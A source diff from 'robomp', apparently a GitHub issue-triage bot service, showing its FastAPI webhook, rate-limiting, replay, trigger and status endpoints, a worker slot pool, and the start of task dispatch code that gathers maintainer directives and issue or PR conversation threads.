"errors": [dict(error) for error in entry.errors],
|
||||
"repos": list(entry.repos),
|
||||
"cache": {"hit": cache_hit, "fetched_at": entry.fetched_at},
|
||||
}
|
||||
|
||||
|
||||
def _require_proxy_mode(cfg: Settings) -> tuple[str, bytes]:
|
||||
if cfg.github_token is not None:
|
||||
raise SystemExit(
|
||||
"robomp orchestrator refuses to start with GITHUB_TOKEN set in env. "
|
||||
"The PAT must live only in the gh-proxy container."
|
||||
)
|
||||
if cfg.gh_proxy_url is None or cfg.gh_proxy_hmac_key is None:
|
||||
raise SystemExit(
|
||||
"robomp orchestrator requires ROBOMP_GH_PROXY_URL and "
|
||||
"ROBOMP_GH_PROXY_HMAC_KEY (run gh-proxy in a sibling container)."
|
||||
)
|
||||
return cfg.gh_proxy_url, cfg.gh_proxy_hmac_key.get_secret_value().encode("utf-8")
|
||||
|
||||
|
||||
def _build_orchestrator(cfg: Settings) -> tuple[GitHubBackend, ProxyGitTransport]:
|
||||
base_url, key = _require_proxy_mode(cfg)
|
||||
github = GitHubProxyClient(base_url=base_url, hmac_key=key)
|
||||
transport = ProxyGitTransport(base_url=base_url, hmac_key=key)
|
||||
return github, transport
|
||||
|
||||
|
||||
def _build_state(settings: Settings) -> dict[str, Any]:
|
||||
db = get_database(settings.sqlite_path)
|
||||
github, git_transport = _build_orchestrator(settings)
|
||||
natives_cache: NativesCache | None = None
|
||||
if settings.natives_cache_enabled:
|
||||
natives_cache = NativesCache(
|
||||
settings.natives_cache_root,
|
||||
max_entries_per_repo=settings.natives_cache_max_entries_per_repo,
|
||||
max_bytes=settings.natives_cache_max_bytes,
|
||||
)
|
||||
sandbox = SandboxManager(
|
||||
settings.workspace_root,
|
||||
transport=git_transport,
|
||||
natives_cache=natives_cache,
|
||||
)
|
||||
pool = WorkerPool(settings=settings, db=db, github=github, sandbox=sandbox, git_transport=git_transport)
|
||||
autoclose = AutocloseScheduler(settings=settings, db=db, github=github)
|
||||
return {
|
||||
"settings": settings,
|
||||
"db": db,
|
||||
"github": github,
|
||||
"git_transport": git_transport,
|
||||
"sandbox": sandbox,
|
||||
"natives_cache": natives_cache,
|
||||
"pool": pool,
|
||||
"issue_browse_cache": _IssueBrowseCache(),
|
||||
"autoclose": autoclose,
|
||||
}
|
||||
|
||||
|
||||
def create_app(settings: Settings | None = None) -> FastAPI:
|
||||
"""Build the FastAPI app. `settings` parameter is for tests."""
|
||||
|
||||
@asynccontextmanager
|
||||
async def lifespan(app: FastAPI) -> AsyncIterator[None]:
|
||||
cfg = settings or get_settings()
|
||||
cfg.ensure_paths()
|
||||
app.state.bag = _build_state(cfg)
|
||||
app.state.bag["started_at"] = time.time()
|
||||
pool: WorkerPool = app.state.bag["pool"]
|
||||
await pool.start()
|
||||
autoclose: AutocloseScheduler = app.state.bag["autoclose"]
|
||||
await autoclose.start()
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
await autoclose.stop()
|
||||
await pool.stop(
|
||||
drain_timeout=cfg.shutdown_drain_timeout_seconds,
|
||||
kill_timeout=cfg.shutdown_kill_timeout_seconds,
|
||||
)
|
||||
|
||||
app = FastAPI(title="robomp", version="0.1.0", lifespan=lifespan)
|
||||
|
||||
@app.get("/healthz")
|
||||
async def healthz() -> dict[str, str]:
|
||||
return {"status": "ok"}
|
||||
|
||||
@app.get("/readyz")
|
||||
async def readyz(request: Request) -> dict[str, str]:
|
||||
pool = request.app.state.bag.get("pool")
|
||||
if pool is None:
|
||||
raise HTTPException(503, "not initialized")
|
||||
return {"status": "ready"}
|
||||
|
||||
@app.post("/webhook/github")
|
||||
async def webhook(
|
||||
request: Request,
|
||||
x_github_event: str = Header(..., alias="X-GitHub-Event"),
|
||||
x_github_delivery: str = Header(..., alias="X-GitHub-Delivery"),
|
||||
x_hub_signature_256: str | None = Header(None, alias="X-Hub-Signature-256"),
|
||||
) -> JSONResponse:
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
body = await request.body()
|
||||
if not github_events.verify_signature(
|
||||
cfg.github_webhook_secret.get_secret_value(),
|
||||
body,
|
||||
x_hub_signature_256,
|
||||
):
|
||||
raise HTTPException(status.HTTP_401_UNAUTHORIZED, "invalid signature")
|
||||
try:
|
||||
payload = await request.json()
|
||||
except Exception as exc:
|
||||
raise HTTPException(status.HTTP_400_BAD_REQUEST, f"invalid json: {exc}") from exc
|
||||
|
||||
db: Database = bag["db"]
|
||||
issue_cache: _IssueBrowseCache = bag["issue_browse_cache"]
|
||||
await issue_cache.apply_webhook(
|
||||
event_type=x_github_event,
|
||||
payload=payload,
|
||||
allowlist=cfg.repo_allowlist,
|
||||
)
|
||||
|
||||
def _resolve(repo_full: str, pr_number: int) -> str | None:
|
||||
row = db.find_issue_by_pr(repo_full, pr_number)
|
||||
return row.key if row else None
|
||||
|
||||
decision = github_events.route(
|
||||
x_github_event,
|
||||
payload,
|
||||
allowlist=cfg.repo_allowlist,
|
||||
bot_login=cfg.bot_login,
|
||||
maintainers=cfg.maintainer_logins,
|
||||
reviewer_bots=cfg.reviewer_bots,
|
||||
resolve_issue_from_pr=_resolve,
|
||||
)
|
||||
|
||||
# Auto-close cancellation hooks. A pending question-issue closure is
|
||||
# cancelled synchronously the moment any human signal arrives:
|
||||
# follow-up comment in the issue thread, or the issue being closed
|
||||
# externally. The DAO is a no-op when no row exists or it's already
|
||||
# past `pending`, so this is safe to fire on every routed event.
|
||||
if decision.issue_key:
|
||||
cancel_reason: str | None = None
|
||||
if (
|
||||
x_github_event == "issue_comment"
|
||||
and str(payload.get("action") or "") == "created"
|
||||
and decision.task == "handle_comment"
|
||||
):
|
||||
cancel_reason = "user_replied"
|
||||
elif x_github_event == "issues" and str(payload.get("action") or "") == "closed":
|
||||
cancel_reason = "externally_closed"
|
||||
if cancel_reason is not None:
|
||||
cancelled = db.cancel_pending_closure(decision.issue_key, reason=cancel_reason)
|
||||
if cancelled:
|
||||
log.info(
|
||||
"autoclose cancelled",
|
||||
extra={
|
||||
"issue_key": decision.issue_key,
|
||||
"reason": cancel_reason,
|
||||
"event": x_github_event,
|
||||
},
|
||||
)
|
||||
|
||||
# Persist directive metadata on the stored payload so the durable
|
||||
# queue (and any replay) carries the maintainer signal forward.
|
||||
if decision.directive:
|
||||
payload = dict(payload)
|
||||
payload["_robomp_directive"] = {
|
||||
"body": decision.directive_body,
|
||||
"author": decision.directive_author,
|
||||
"pragmas": [list(item) for item in decision.directive_pragmas],
|
||||
}
|
||||
|
||||
if not decision.should_queue:
|
||||
log.info("skip", extra={"event": x_github_event, "reason": decision.reason})
|
||||
db.record_event(
|
||||
delivery_id=x_github_delivery,
|
||||
event_type=x_github_event,
|
||||
repo=decision.repo,
|
||||
issue_key=decision.issue_key,
|
||||
payload=payload,
|
||||
state="skipped",
|
||||
last_error=decision.reason,
|
||||
)
|
||||
return JSONResponse({"delivery": x_github_delivery, "state": "skipped"}, status_code=202)
|
||||
|
||||
# Per-user rate limiting. Lifecycle events (cleanup) carry no submitter
|
||||
# and are not gated. For everything user-driven, atomically record the
|
||||
# accepted delivery while checking the rolling window against the tier cap.
|
||||
submitter = decision.submitter
|
||||
if submitter:
|
||||
cap = github_events.rate_limit_cap(
|
||||
submitter,
|
||||
decision.association,
|
||||
unlimited=cfg.rate_limit_unlimited | cfg.maintainer_logins,
|
||||
default=cfg.rate_limit_default,
|
||||
contributor=cfg.rate_limit_contributor,
|
||||
)
|
||||
since = iso_seconds_ago(cfg.rate_limit_window_seconds)
|
||||
admission = db.admit_submission(
|
||||
delivery_id=x_github_delivery,
|
||||
login=submitter,
|
||||
repo=decision.repo,
|
||||
since=since,
|
||||
cap=cap,
|
||||
)
|
||||
if not admission.accepted:
|
||||
window = int(cfg.rate_limit_window_seconds)
|
||||
reason = f"rate limit: @{submitter} has used {admission.used}/{cap} submissions in the last {window}s"
|
||||
log.info(
|
||||
"rate_limited",
|
||||
extra={
|
||||
"event": x_github_event,
|
||||
"delivery": x_github_delivery,
|
||||
"login": submitter,
|
||||
"association": decision.association,
|
||||
"used": admission.used,
|
||||
"cap": cap,
|
||||
},
|
||||
)
|
||||
db.record_event(
|
||||
delivery_id=x_github_delivery,
|
||||
event_type=x_github_event,
|
||||
repo=decision.repo,
|
||||
issue_key=decision.issue_key,
|
||||
payload=payload,
|
||||
state="skipped",
|
||||
last_error=reason,
|
||||
)
|
||||
return JSONResponse(
|
||||
{"delivery": x_github_delivery, "state": "skipped", "reason": "rate_limited"},
|
||||
status_code=202,
|
||||
)
|
||||
|
||||
inserted = db.record_event(
|
||||
delivery_id=x_github_delivery,
|
||||
event_type=x_github_event,
|
||||
repo=decision.repo,
|
||||
issue_key=decision.issue_key,
|
||||
payload=payload,
|
||||
state="queued",
|
||||
)
|
||||
if inserted:
|
||||
pool: WorkerPool = bag["pool"]
|
||||
pool.wake()
|
||||
log.info(
|
||||
"queued", extra={"event": x_github_event, "delivery": x_github_delivery, "key": decision.issue_key}
|
||||
)
|
||||
else:
|
||||
log.info("duplicate", extra={"event": x_github_event, "delivery": x_github_delivery})
|
||||
return JSONResponse({"delivery": x_github_delivery, "state": "queued"}, status_code=202)
|
||||
|
||||
@app.post("/replay")
|
||||
async def replay(
|
||||
request: Request,
|
||||
x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"),
|
||||
delivery_id: str = "",
|
||||
) -> JSONResponse:
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
if cfg.replay_token is None:
|
||||
raise HTTPException(404, "replay disabled")
|
||||
if x_robomp_token != cfg.replay_token.get_secret_value():
|
||||
raise HTTPException(401, "invalid replay token")
|
||||
db: Database = bag["db"]
|
||||
row = db.get_event(delivery_id)
|
||||
if row is None:
|
||||
raise HTTPException(404, "unknown delivery")
|
||||
if not db.requeue_event(delivery_id, from_states=INACTIVE_EVENT_STATES):
|
||||
raise HTTPException(409, f"delivery {delivery_id} is {row.state}; only inactive events can be replayed")
|
||||
bag["pool"].wake()
|
||||
return JSONResponse({"delivery": delivery_id, "state": "queued"})
|
||||
|
||||
def _require_trigger_token(cfg: Settings, token: str | None) -> None:
|
||||
if cfg.replay_token is None:
|
||||
raise HTTPException(404, "trigger disabled (set ROBOMP_REPLAY_TOKEN to enable)")
|
||||
if token != cfg.replay_token.get_secret_value():
|
||||
raise HTTPException(401, "invalid replay token")
|
||||
|
||||
@app.get("/api/github/issues")
|
||||
async def api_github_issues(
|
||||
request: Request,
|
||||
state: str = "open",
|
||||
limit: int = 30,
|
||||
refresh: bool = False,
|
||||
x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"),
|
||||
) -> dict[str, Any]:
|
||||
"""Browse issues across `ROBOMP_REPO_ALLOWLIST` for the trigger picker.
|
||||
|
||||
Token-gated identically to `/api/trigger`: this can expose titles from
|
||||
private repos. Normal dashboard loads use the server cache; only cache
|
||||
misses and explicit refreshes hit GitHub.
|
||||
"""
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
_require_trigger_token(cfg, x_robomp_token)
|
||||
|
||||
if state not in ("open", "closed", "all"):
|
||||
raise HTTPException(400, "state must be open|closed|all")
|
||||
capped = max(1, min(int(limit), 100))
|
||||
github: GitHubBackend = bag["github"]
|
||||
issue_cache: _IssueBrowseCache = bag["issue_browse_cache"]
|
||||
repos = tuple(sorted(cfg.repo_allowlist))
|
||||
if not repos:
|
||||
return {"issues": [], "errors": [], "repos": [], "cache": {"hit": False, "fetched_at": time.time()}}
|
||||
|
||||
async def _fetch() -> tuple[list[IssueSummary], list[dict[str, str]]]:
|
||||
# Fan out across allowlisted repos; per-repo failures don't take down the panel.
|
||||
async def _one(repo: str) -> tuple[str, list[IssueSummary], str | None]:
|
||||
try:
|
||||
items = await github.list_issues(repo, state=state, limit=capped)
|
||||
return repo, items, None
|
||||
except Exception as exc: # GitHubError, network, etc.
|
||||
log.warning("list_issues failed", extra={"repo": repo, "err": str(exc)})
|
||||
return repo, [], str(exc)
|
||||
|
||||
results = await asyncio.gather(*(_one(r) for r in repos))
|
||||
merged: list[IssueSummary] = []
|
||||
errors: list[dict[str, str]] = []
|
||||
for repo, items, err in results:
|
||||
if err is not None:
|
||||
errors.append({"repo": repo, "error": err})
|
||||
merged.extend(items)
|
||||
return merged, errors
|
||||
|
||||
entry, cache_hit = await issue_cache.get_or_fetch(
|
||||
state=state,
|
||||
limit=capped,
|
||||
repos=repos,
|
||||
force=refresh,
|
||||
fetch=_fetch,
|
||||
)
|
||||
# `processed` is not cached: a freshly-triaged issue must immediately
|
||||
# disappear from the "fresh issues" filter on the next dashboard refresh.
|
||||
db: Database = bag["db"]
|
||||
processed = frozenset(db.processed_issue_keys(make_issue_key(s.repo, s.number) for s in entry.issues))
|
||||
return _issue_browse_payload(entry=entry, cache_hit=cache_hit, processed_keys=processed)
|
||||
|
||||
@app.post("/api/trigger")
|
||||
async def api_trigger(
|
||||
request: Request,
|
||||
payload: dict[str, Any] = Body(...),
|
||||
x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"),
|
||||
) -> JSONResponse:
|
||||
"""Manually queue an issue. Modes:
|
||||
|
||||
- `triage`: fetch fresh from GitHub and enqueue (or re-enqueue) as if `issues.opened`.
|
||||
- `retry`: requeue an existing stored event. Identify it by `delivery_id` or `issue`.
|
||||
"""
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
_require_trigger_token(cfg, x_robomp_token)
|
||||
|
||||
db: Database = bag["db"]
|
||||
github: GitHubBackend = bag["github"]
|
||||
pool: WorkerPool = bag["pool"]
|
||||
|
||||
mode = str(payload.get("mode") or "").strip().lower()
|
||||
if mode not in ("triage", "retry"):
|
||||
raise HTTPException(400, "mode must be 'triage' or 'retry'")
|
||||
|
||||
issue_ref = payload.get("issue")
|
||||
delivery_id = payload.get("delivery_id")
|
||||
|
||||
if mode == "triage":
|
||||
if not isinstance(issue_ref, str) or not issue_ref:
|
||||
raise HTTPException(400, "triage requires 'issue' = 'owner/repo#NN'")
|
||||
try:
|
||||
repo_full, number = parse_issue_ref(issue_ref)
|
||||
except InvalidIssueRef as exc:
|
||||
raise HTTPException(400, str(exc)) from exc
|
||||
if not cfg.allows(repo_full):
|
||||
raise HTTPException(403, f"{repo_full} not in ROBOMP_REPO_ALLOWLIST")
|
||||
try:
|
||||
delivery = await enqueue_manual_triage(
|
||||
db=db,
|
||||
github=github,
|
||||
repo_full=repo_full,
|
||||
number=number,
|
||||
)
|
||||
except ManualTriageConflict as exc:
|
||||
raise HTTPException(409, str(exc)) from exc
|
||||
except ManualTriageError as exc:
|
||||
raise HTTPException(400, str(exc)) from exc
|
||||
except GitHubError as exc:
|
||||
raise HTTPException(502, f"github error: {exc.status} {exc.message}") from exc
|
||||
pool.wake()
|
||||
log.info("manual triage", extra={"delivery": delivery, "issue": f"{repo_full}#{number}"})
|
||||
return JSONResponse(
|
||||
{"delivery": delivery, "state": "queued", "mode": "triage"},
|
||||
status_code=202,
|
||||
)
|
||||
|
||||
# mode == "retry"
|
||||
if isinstance(delivery_id, str) and delivery_id:
|
||||
target = delivery_id
|
||||
elif isinstance(issue_ref, str) and issue_ref:
|
||||
try:
|
||||
repo_full, number = parse_issue_ref(issue_ref)
|
||||
except InvalidIssueRef as exc:
|
||||
raise HTTPException(400, str(exc)) from exc
|
||||
if not cfg.allows(repo_full):
|
||||
raise HTTPException(403, f"{repo_full} not in ROBOMP_REPO_ALLOWLIST")
|
||||
row = db.latest_event_for_issue(make_issue_key(repo_full, number))
|
||||
if row is None:
|
||||
raise HTTPException(404, f"no retryable stored event for {repo_full}#{number}")
|
||||
target = row.delivery_id
|
||||
else:
|
||||
raise HTTPException(400, "retry requires 'delivery_id' or 'issue'")
|
||||
|
||||
event = db.get_event(target)
|
||||
if event is None:
|
||||
raise HTTPException(404, f"unknown delivery {target}")
|
||||
if not db.requeue_event(target, from_states=INACTIVE_EVENT_STATES):
|
||||
raise HTTPException(409, f"delivery {target} is {event.state}; only inactive events can be retried")
|
||||
pool.wake()
|
||||
log.info("manual retry", extra={"delivery": target})
|
||||
return JSONResponse(
|
||||
{"delivery": target, "state": "queued", "mode": "retry"},
|
||||
status_code=202,
|
||||
)
|
||||
|
||||
@app.post("/api/cancel")
|
||||
async def api_cancel(
|
||||
request: Request,
|
||||
payload: dict[str, Any] = Body(...),
|
||||
x_robomp_token: str | None = Header(None, alias="X-Robomp-Replay-Token"),
|
||||
) -> JSONResponse:
|
||||
"""Stop a running event. The omp subprocess is killed; the row lands in
|
||||
`failed` with `cancelled by operator` as the error.
|
||||
"""
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
_require_trigger_token(cfg, x_robomp_token)
|
||||
|
||||
delivery_id = payload.get("delivery_id")
|
||||
if not isinstance(delivery_id, str) or not delivery_id:
|
||||
raise HTTPException(400, "cancel requires 'delivery_id'")
|
||||
|
||||
db: Database = bag["db"]
|
||||
event = db.get_event(delivery_id)
|
||||
if event is None:
|
||||
raise HTTPException(404, f"unknown delivery {delivery_id}")
|
||||
|
||||
pool: WorkerPool = bag["pool"]
|
||||
fired = await pool.cancel_event(delivery_id)
|
||||
log.info(
|
||||
"manual cancel",
|
||||
extra={"delivery": delivery_id, "fired": fired, "state": event.state},
|
||||
)
|
||||
return JSONResponse(
|
||||
{"delivery": delivery_id, "fired": fired, "previous_state": event.state},
|
||||
status_code=202,
|
||||
)
|
||||
|
||||
@app.get("/events")
|
||||
async def events(request: Request, limit: int = 50) -> dict[str, Any]:
|
||||
rows = request.app.state.bag["db"].list_events(limit=limit)
|
||||
return {
|
||||
"events": [
|
||||
{
|
||||
"delivery_id": r.delivery_id,
|
||||
"event_type": r.event_type,
|
||||
"repo": r.repo,
|
||||
"issue_key": r.issue_key,
|
||||
"state": r.state,
|
||||
"attempts": r.attempts,
|
||||
"received_at": r.received_at,
|
||||
"last_error": r.last_error,
|
||||
}
|
||||
for r in rows
|
||||
]
|
||||
}
|
||||
|
||||
@app.get("/issues")
|
||||
async def issues(request: Request, limit: int = 100) -> dict[str, Any]:
|
||||
rows = request.app.state.bag["db"].list_issues(limit=limit)
|
||||
return {
|
||||
"issues": [
|
||||
{
|
||||
"key": r.key,
|
||||
"repo": r.repo,
|
||||
"number": r.number,
|
||||
"branch": r.branch,
|
||||
"pr_number": r.pr_number,
|
||||
"state": r.state,
|
||||
"classification": r.classification,
|
||||
"updated_at": r.updated_at,
|
||||
}
|
||||
for r in rows
|
||||
]
|
||||
}
|
||||
|
||||
@app.get("/", response_class=HTMLResponse)
|
||||
async def index(request: Request) -> HTMLResponse:
|
||||
cfg: Settings = request.app.state.bag["settings"]
|
||||
token = cfg.replay_token.get_secret_value() if cfg.replay_token else None
|
||||
return HTMLResponse(render_index(token))
|
||||
|
||||
@app.get("/api/status")
|
||||
async def api_status(request: Request) -> dict[str, Any]:
|
||||
bag = request.app.state.bag
|
||||
cfg: Settings = bag["settings"]
|
||||
db: Database = bag["db"]
|
||||
pool: WorkerPool = bag["pool"]
|
||||
started = float(bag.get("started_at") or time.time())
|
||||
issues_rows = db.list_issues(limit=200)
|
||||
latest_events = db.latest_events_for_issues(r.key for r in issues_rows)
|
||||
|
||||
def _latest_event_payload(key: str) -> dict[str, Any] | None:
|
||||
latest = latest_events.get(key)
|
||||
if latest is None:
|
||||
return None
|
||||
return {
|
||||
"delivery_id": latest.delivery_id,
|
||||
"event_type": latest.event_type,
|
||||
"state": latest.state,
|
||||
"attempts": latest.attempts,
|
||||
"received_at": latest.received_at,
|
||||
"last_error": latest.last_error,
|
||||
}
|
||||
|
||||
events_rows = db.list_events(limit=25)
|
||||
return {
|
||||
"runtime": {
|
||||
"bot_login": cfg.bot_login,
|
||||
"repo_allowlist": sorted(cfg.repo_allowlist),
|
||||
"max_concurrency": cfg.max_concurrency,
|
||||
"model": cfg.model,
|
||||
"thinking_level": cfg.thinking_level,
|
||||
"uptime_seconds": max(0.0, time.time() - started),
|
||||
},
|
||||
"event_counts": db.event_state_counts(),
|
||||
"issue_event_counts": db.latest_issue_event_state_counts(),
|
||||
"running_events": db.list_running_events(),
|
||||
"inflight": await pool.inflight_snapshot(),
|
||||
"issues": [
|
||||
{
|
||||
"key": r.key,
|
||||
"repo": r.repo,
|
||||
"number": r.number,
|
||||
"branch": r.branch,
|
||||
"pr_number": r.pr_number,
|
||||
"state": r.state,
|
||||
"classification": r.classification,
|
||||
"updated_at": r.updated_at,
|
||||
"latest_event": _latest_event_payload(r.key),
|
||||
}
|
||||
for r in issues_rows
|
||||
],
|
||||
"recent_events": [
|
||||
{
|
||||
"delivery_id": r.delivery_id,
|
||||
"event_type": r.event_type,
|
||||
"repo": r.repo,
|
||||
"issue_key": r.issue_key,
|
||||
"state": r.state,
|
||||
"attempts": r.attempts,
|
||||
"received_at": r.received_at,
|
||||
"last_error": r.last_error,
|
||||
}
|
||||
for r in events_rows
|
||||
],
|
||||
}
|
||||
|
||||
@app.get("/api/logs")
|
||||
async def api_logs(request: Request, limit: int = 400) -> dict[str, Any]:
|
||||
cfg: Settings = request.app.state.bag["settings"]
|
||||
capped = max(1, min(int(limit), 2000))
|
||||
entries = tail_jsonl(cfg.log_dir / "robomp.log.jsonl", limit=capped)
|
||||
return {"entries": entries, "count": len(entries), "limit": capped}
|
||||
|
||||
# Mount the built dashboard bundle. The `index.html` itself is served by
|
||||
# the `@app.get("/")` handler above so the per-instance replay-token can
|
||||
# be substituted; `/static/*` carries the hashed JS/CSS produced by Vite.
|
||||
app.mount("/static", StaticFiles(directory=static_dir()), name="static")
|
||||
|
||||
return app
|
||||
|
||||
|
||||
__all__ = ["create_app"]
|
||||
@@ -0,0 +1,37 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from collections.abc import Iterable
|
||||
|
||||
|
||||
class SlotPool:
|
||||
def __init__(self, slot_uids: Iterable[int] = ()) -> None:
|
||||
self._slot_uids = tuple(slot_uids)
|
||||
if len(self._slot_uids) != len(set(self._slot_uids)):
|
||||
raise ValueError("slot UIDs must be unique")
|
||||
|
||||
self._available: asyncio.Queue[int] = asyncio.Queue()
|
||||
for slot_uid in self._slot_uids:
|
||||
self._available.put_nowait(slot_uid)
|
||||
self._checked_out: set[int] = set()
|
||||
|
||||
@property
|
||||
def slot_uids(self) -> tuple[int, ...]:
|
||||
return self._slot_uids
|
||||
|
||||
async def acquire(self) -> int | None:
|
||||
if not self._slot_uids:
|
||||
return None
|
||||
|
||||
slot_uid = await self._available.get()
|
||||
self._checked_out.add(slot_uid)
|
||||
return slot_uid
|
||||
|
||||
def release(self, slot_uid: int | None) -> None:
|
||||
if not self._slot_uids and slot_uid is None:
|
||||
return
|
||||
if slot_uid is None or slot_uid not in self._checked_out:
|
||||
raise ValueError("slot UID was not acquired")
|
||||
|
||||
self._checked_out.remove(slot_uid)
|
||||
self._available.put_nowait(slot_uid)
|
||||
@@ -0,0 +1,709 @@
|
||||
"""Task entry points dispatched off the durable event queue."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from collections.abc import Mapping
|
||||
from typing import Any
|
||||
|
||||
from robomp import persona
|
||||
from robomp.config import Settings
|
||||
from robomp.db import Database, IssueRow, IssueState, issue_key
|
||||
from robomp.github_backend import GitHubBackend
|
||||
from robomp.github_client import (
|
||||
CommentInfo,
|
||||
GitHubError,
|
||||
IssueInfo,
|
||||
PullRequestInfo,
|
||||
RepoInfo,
|
||||
parse_issue_payload,
|
||||
)
|
||||
from robomp.sandbox import GitTransport, SandboxManager
|
||||
from robomp.worker import DirectiveInfo, TaskInputs, ThreadMessage, run_task
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def _comment_from_payload(payload: Mapping[str, Any]) -> CommentInfo:
|
||||
c = payload.get("comment") or {}
|
||||
user = c.get("user") or {}
|
||||
return CommentInfo(
|
||||
id=int(c.get("id") or 0),
|
||||
author=str(user.get("login") or ""),
|
||||
body=str(c.get("body") or ""),
|
||||
created_at=str(c.get("created_at") or ""),
|
||||
)
|
||||
|
||||
|
||||
def _directive_from_payload(payload: Mapping[str, Any]) -> DirectiveInfo | None:
|
||||
"""Extract the maintainer directive the webhook handler stashed, if any."""
|
||||
raw = payload.get("_robomp_directive")
|
||||
if not isinstance(raw, Mapping):
|
||||
return None
|
||||
body = raw.get("body")
|
||||
author = raw.get("author")
|
||||
if not isinstance(body, str) or not body.strip():
|
||||
return None
|
||||
if not isinstance(author, str) or not author.strip():
|
||||
return None
|
||||
pragmas: list[tuple[str, str]] = []
|
||||
raw_pragmas = raw.get("pragmas")
|
||||
if isinstance(raw_pragmas, list):
|
||||
for entry in raw_pragmas:
|
||||
if isinstance(entry, (list, tuple)) and len(entry) == 2:
|
||||
k, v = entry
|
||||
if isinstance(k, str) and isinstance(v, str):
|
||||
pragmas.append((k, v))
|
||||
return DirectiveInfo(body=body, author=author, pragmas=tuple(pragmas))
|
||||
|
||||
|
||||
async def _fetch_thread(
|
||||
github: GitHubBackend,
|
||||
repo: str,
|
||||
number: int,
|
||||
*,
|
||||
is_pr: bool,
|
||||
) -> tuple[ThreadMessage, ...]:
|
||||
"""Pull the full conversation thread (body + comments + reviews) for `number`.
|
||||
|
||||
Best-effort: any sub-fetch that fails is logged + dropped so a stale
|
||||
review-comments endpoint doesn't block the directive from running.
|
||||
"""
|
||||
messages: list[ThreadMessage] = []
|
||||
|
||||
# 1. The issue / PR body itself. Use get_issue (issues endpoint also
|
||||
# returns PRs in GitHub's data model).
|
||||
try:
|
||||
item = await github.get_issue(repo, number)
|
||||
if item.body and item.body.strip():
|
||||
messages.append(
|
||||
ThreadMessage(
|
||||
kind="pr_body" if is_pr else "issue_body",
|
||||
author=item.author or "",
|
||||
body=item.body,
|
||||
created_at="", # not exposed by IssueInfo
|
||||
)
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("thread body fetch failed", extra={"repo": repo, "n": number, "err": str(exc)})
|
||||
|
||||
# 2. Conversation comments (issue OR PR conversation).
|
||||
try:
|
||||
for c in await github.list_comments(repo, number):
|
||||
messages.append(
|
||||
ThreadMessage(
|
||||
kind="comment",
|
||||
author=c.author,
|
||||
body=c.body,
|
||||
created_at=c.created_at,
|
||||
)
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("thread comments fetch failed", extra={"err": str(exc)})
|
||||
|
||||
if is_pr:
|
||||
# 3. Inline review comments (attached to a path:line).
|
||||
try:
|
||||
for r in await github.list_review_comments(repo, number):
|
||||
messages.append(
|
||||
ThreadMessage(
|
||||
kind="review_comment",
|
||||
author=r.author,
|
||||
body=r.body,
|
||||
created_at=r.created_at,
|
||||
path=r.path,
|
||||
line=r.line,
|
||||
)
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("thread review-comments fetch failed", extra={"err": str(exc)})
|
||||
# 4. Top-level reviews (summaries).
|
||||
try:
|
||||
for rv in await github.list_pr_reviews(repo, number):
|
||||
messages.append(
|
||||
ThreadMessage(
|
||||
kind="review",
|
||||
author=rv.author,
|
||||
body=rv.body,
|
||||
created_at=rv.submitted_at,
|
||||
state=rv.state,
|
||||
)
|
||||
)
|
||||
except GitHubError as exc:
|
||||
log.warning("thread reviews fetch failed", extra={"err": str(exc)})
|
||||
|
||||
# ISO 8601 strings sort chronologically. Body has no timestamp so it
|
||||
# sorts first (empty string < any "2026-…" string).
|
||||
messages.sort(key=lambda m: m.created_at or "")
|
||||
return tuple(messages)
|
||||
|
||||
|
||||
async def _attach_thread(
|
||||
github: GitHubBackend,
|
||||
directive: DirectiveInfo | None,
|
||||
repo: str,
|
||||
number: int,
|
||||
*,
|
||||
is_pr: bool,
|
||||
) -> DirectiveInfo | None:
|
||||
"""Hydrate a directive with the live conversation thread (or no-op if None)."""
|
||||
if directive is None:
|
||||
return None
|
||||
thread = await _fetch_thread(github, repo, number, is_pr=is_pr)
|
||||
return DirectiveInfo(body=directive.body, author=directive.author, thread=thread, pragmas=directive.pragmas)
|
||||
|
||||
|
||||
async def _resolve_repo_and_issue(
|
||||
github: GitHubBackend,
|
||||
payload: Mapping[str, Any],
|
||||
) -> tuple[RepoInfo, IssueInfo]:
|
||||
repo, issue = parse_issue_payload(payload)
|
||||
if not issue.body:
|
||||
# Webhook payloads sometimes omit body; refetch to be safe.
|
||||
try:
|
||||
issue = await github.get_issue(repo.full_name, issue.number)
|
||||
except GitHubError as exc:
|
||||
log.warning("issue refetch failed", extra={"err": str(exc)})
|
||||
return repo, issue
|
||||
|
||||
|
||||
async def _resolve_issue_row_for_pr(
|
||||
*,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
repo_full: str,
|
||||
pr_number: int,
|
||||
) -> tuple[IssueRow | None, PullRequestInfo | None]:
|
||||
"""Find the originating issue row for a PR, repairing stale mappings when possible."""
|
||||
issue_row = db.find_issue_by_pr(repo_full, pr_number)
|
||||
pr_info: PullRequestInfo | None = None
|
||||
if issue_row is None or issue_row.branch is None:
|
||||
try:
|
||||
pr_info = await github.get_pull_request(repo_full, pr_number)
|
||||
except GitHubError as exc:
|
||||
log.warning("PR metadata fetch failed", extra={"repo": repo_full, "pr": pr_number, "err": str(exc)})
|
||||
return issue_row, None
|
||||
|
||||
if issue_row is None and pr_info is not None and pr_info.head_ref:
|
||||
issue_row = db.find_issue_by_branch(repo_full, pr_info.head_ref)
|
||||
if issue_row is not None:
|
||||
db.set_issue_pr(issue_row.key, pr_number)
|
||||
issue_row = db.get_issue(issue_row.key) or issue_row
|
||||
elif issue_row is not None and issue_row.branch is None and pr_info is not None and pr_info.head_ref:
|
||||
db.set_issue_branch(issue_row.key, pr_info.head_ref)
|
||||
